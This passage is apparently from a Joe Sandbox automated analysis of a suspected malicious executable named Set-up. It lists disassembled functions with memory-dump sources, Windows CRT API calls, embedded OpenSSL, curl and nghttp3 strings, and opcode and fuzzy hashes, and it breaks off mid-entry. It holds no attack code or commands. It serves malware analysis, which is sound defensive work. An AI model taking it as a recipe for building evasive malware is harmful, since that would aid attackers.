                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                            • API String ID: 1222420520-3888743547
                            • Opcode ID: 41c1061a981dc9ebf74f15fed5ca8cbaeb408464165674c2519f203a48459f99
                            • Instruction ID: 6886f2567f9e4a7cae4e59e69cd7353c501c70fe4163cb511eb7ca1abfba6d44
                            • Opcode Fuzzy Hash: 41c1061a981dc9ebf74f15fed5ca8cbaeb408464165674c2519f203a48459f99
                            • Instruction Fuzzy Hash: F1314971900304CFD704EF18D885A66B7E0FF85318F09857CE88DA7751E671AD95CB92
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,008A4D5A,00000000,?,000001F0), ref: 008A8861
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 008A8873
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                            • API String ID: 1222420520-3025919285
                            • Opcode ID: 52ff45afd6fdae75a7495a2b573c1bb8d799289f25c94d4ad4719de795204b04
                            • Instruction ID: 7abb95db9c02e064d8afe0d26ea68f373416933e9d263e700b13f45e3ef15f6b
                            • Opcode Fuzzy Hash: 52ff45afd6fdae75a7495a2b573c1bb8d799289f25c94d4ad4719de795204b04
                            • Instruction Fuzzy Hash: 7F11C2B6A44601EFE6008F29EC41A59B364FB42731B044625F818E76D2DB24E8648BF5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: application/octet-stream$formdata.c
                            • API String ID: 0-1216067158
                            • Opcode ID: abcda446a920d8f559dc1f1adaef9508445620c066f55849a65a79ab907f66ac
                            • Instruction ID: 876125a04a51b452034273aa5b68d24d7ac07a36a9847d5c9b54707457b955c4
                            • Opcode Fuzzy Hash: abcda446a920d8f559dc1f1adaef9508445620c066f55849a65a79ab907f66ac
                            • Instruction Fuzzy Hash: EE02A0B0A48B409BE7A48F14DD40727BBD1FF54318F18582CD98ACB7D2E775E8858B92
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AA46DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                            • API String ID: 39653677-2338284442
                            • Opcode ID: cc74887757d57c301dedaca84224afb7af89758ce4a5ae23726903a7630fbc55
                            • Instruction ID: 382e9b3a10e16dd6d507f35d1128a1baa1f020f5f436ce9c747198f204582cd5
                            • Opcode Fuzzy Hash: cc74887757d57c301dedaca84224afb7af89758ce4a5ae23726903a7630fbc55
                            • Instruction Fuzzy Hash: F8A11771B48301AFD324AF58AD42B6BB394ABDBB54F04452CF9495B3C2E7F5D80482A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: .%lu$crypto/objects/obj_dat.c
                            • API String ID: 0-3322715555
                            • Opcode ID: 3f49bf41cfc064dbdb9860d11913af71e8b5d4dc45e2be8976df929e83c27857
                            • Instruction ID: ba36e5546cb80fdceb000e5b7206ad94fe3955a233bd391460ac5f81b76cbaaf
                            • Opcode Fuzzy Hash: 3f49bf41cfc064dbdb9860d11913af71e8b5d4dc45e2be8976df929e83c27857
                            • Instruction Fuzzy Hash: 48A1F1B1A083099BD710AF25895173BB7E9AFD0744F18882DFA898B351EB75DC04D792
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                            • API String ID: 0-950935550
                            • Opcode ID: d974e04360224be1e402f62646f4c24595c4ec07b168d383caf51fc8797d8ee9
                            • Instruction ID: 2ade7e2d9795ff4ae669e9657adffcd9faba6cd3e07db6fe31e4868492f8b6dc
                            • Opcode Fuzzy Hash: d974e04360224be1e402f62646f4c24595c4ec07b168d383caf51fc8797d8ee9
                            • Instruction Fuzzy Hash: D5B1B4B1B00A02ABE7299B78DC45BE6FB94FF51315F040239E86CD2281E73575A4DBD2
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0095A37F
                            Strings
                            • ssl/quic/quic_channel.c, xrefs: 0095A2E3, 0095A3BA
                            • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0095A310
                            • ossl_quic_channel_raise_protocol_error_loc, xrefs: 0095A2D9, 0095A3B0
                            • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0095A3D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                            • API String ID: 39653677-1084217658
                            • Opcode ID: a4a73e1ec608f53f210c19529f17c3a0e6559349e4367b194e58013a08963490
                            • Instruction ID: b4047cbe74305f9d23cd9c7884437b51d19e897451414d3b4d0defc0bf2f7b13
                            • Opcode Fuzzy Hash: a4a73e1ec608f53f210c19529f17c3a0e6559349e4367b194e58013a08963490
                            • Instruction Fuzzy Hash: EF516FB1A04345AFDF00DF69DC42E9B7BE9AFC8754F044A28FD4897241E631D918CBA2
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,008D0E3B,?,?,00000000,?), ref: 00B863E9
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,008D0E3B,?,?,00000000,?), ref: 00B863FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno
                            • String ID:
                            • API String ID: 2918714741-0
                            • Opcode ID: 1689a47b29146103d0071874d61a8e964020db24653e57398c77eada799663d4
                            • Instruction ID: 28b331668a2a4a73ad25c29a24ba448e5c8338584db71cb665e8a2584f9cc0bc
                            • Opcode Fuzzy Hash: 1689a47b29146103d0071874d61a8e964020db24653e57398c77eada799663d4
                            • Instruction Fuzzy Hash: 6841AEB1A083119BEB04BE6DA8C1A2B77E9EB94714F5944BCE849C7221E670EC04C796
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 009B691C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                            • API String ID: 39653677-804487489
                            • Opcode ID: 3920677af1e5c73698392aef304c6a68862590e6c75c20690c5b8035a65278ae
                            • Instruction ID: bdcbbb2cf166903ddb6d4e58c96da855a5bcde28f3fa29f29195e3d1ee0416c4
                            • Opcode Fuzzy Hash: 3920677af1e5c73698392aef304c6a68862590e6c75c20690c5b8035a65278ae
                            • Instruction Fuzzy Hash: B331E9B2A04304BBFB306A159D46BEB769C9BD1714F040438FD5C562D2F679BD1CC2A1
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00B4ABB9), ref: 00B4A34E
                              • Part of subcall function 009DE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 009DE28D
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00B4ABB9), ref: 00B4A446
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$_errno
                            • String ID: .cnf$.conf$crypto/conf/conf_def.c
                            • API String ID: 3066963124-3060939390
                            • Opcode ID: b018278e29938eb3ab17ac77195f54f861f6e6d1bffa2c02ee4cb48412666205
                            • Instruction ID: 0897222c9ab1f1863008adb67bc1010e1d0276c0037d71576bc52e22ea70e4fd
                            • Opcode Fuzzy Hash: b018278e29938eb3ab17ac77195f54f861f6e6d1bffa2c02ee4cb48412666205
                            • Instruction Fuzzy Hash: DD21F7F6E842026BEA107B34AC82F1F36DCDF91755F044879F94996382FA65DE089263
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,009DF556,00000000,FFFFFFFF,00000000,?,00000000,009E06DF,?), ref: 009908D7
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0095973B), ref: 00990977
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memsetstrcpystrlen
                            • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                            • API String ID: 1298912638-2735992530
                            • Opcode ID: 67489a9b8910a5fea3495afda0b51522efb3f8a664ac50c06271612ee26f2802
                            • Instruction ID: d137dbbc55beb0fbd7cc38fe751dd1805c89185461a7aee782d1c0a0d3c7cf68
                            • Opcode Fuzzy Hash: 67489a9b8910a5fea3495afda0b51522efb3f8a664ac50c06271612ee26f2802
                            • Instruction Fuzzy Hash: B331E7B1E442026FEB14AA689C03B2AB79C9BC0724F148625F928973D3E765AC1487E1
                            APIs
                              • Part of subcall function 00B87850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00B866E9,?,?,?,?,?,?,?,?,?,?,?), ref: 00B8787B
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B866F5
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00E1530C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86714
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86727
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B86776
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B867CC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno$strcmp
                            • String ID:
                            • API String ID: 3909137471-0
                            • Opcode ID: 309888f0386485ee0f628ed3fa826d34a07e21f5f99598aa686e07b6bcc2e5a3
                            • Instruction ID: 62bc0b55b382aaf158c1399bb1af8461636dc69e5b1d237324a8bb107d6305b9
                            • Opcode Fuzzy Hash: 309888f0386485ee0f628ed3fa826d34a07e21f5f99598aa686e07b6bcc2e5a3
                            • Instruction Fuzzy Hash: 0731BF796002009FDF10AF65DC44A5A77E9EF4A328F4445A8FD98EB221F731ED11CB91
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,009E2704,00000008), ref: 009E204D
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
